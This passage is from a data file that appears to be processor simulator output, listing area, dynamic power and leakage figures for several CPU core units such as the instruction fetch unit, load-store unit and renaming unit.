'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.93428,
'Instruction Fetch Unit/Runtime Dynamic': 0.680612,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0327293,
'L2/Runtime Dynamic': 0.0134497,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.28732,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.01348,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0663288,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0663288,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.60054,
'Load Store Unit/Runtime Dynamic': 1.40692,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.163555,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.327111,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0580464,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0585369,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.338936,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0459651,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.594759,
'Memory Management Unit/Runtime Dynamic': 0.104502,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.7347,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.187153,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0152434,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.143713,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.34611,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.8859,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0543055,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.245343,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.394195,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.260055,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.41946,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.211729,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.891244,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.236992,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.92342,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0744719,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0109079,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.095105,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0806705,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.169577,
'Execution Unit/Register Files/Runtime Dynamic': 0.0915784,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.213939,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.555101,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.18864,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00174099,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00174099,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00154949,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000617927,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00115884,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0061903,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0155103,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0775507,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.93289,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.227723,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.263397,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.3908,
'Instruction Fetch Unit/Runtime Dynamic': 0.590371,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0228357,
'L2/Runtime Dynamic': 0.00464711,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.6387,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15404,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0776969,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0776969,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.0056,
'Load Store Unit/Runtime Dynamic': 1.61491,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.191587,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.383174,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.067995,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0683372,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.306709,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0373336,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.579621,
'Memory Management Unit/Runtime Dynamic': 0.105671,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.5118,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.195901,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0141171,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.129012,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.33903,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.84328,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0623769,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.251682,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.337606,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.224582,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.362242,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.182848,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.769672,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.205098,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.81868,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0637809,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00941997,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0914408,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0696664,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.155222,
'Execution Unit/Register Files/Runtime Dynamic': 0.0790864,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.208238,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.526198,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.03202,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00132104,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00132104,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00115785,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000452173,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00100076,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00480069,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0124079,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0669721,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.26,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.200165,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.227468,
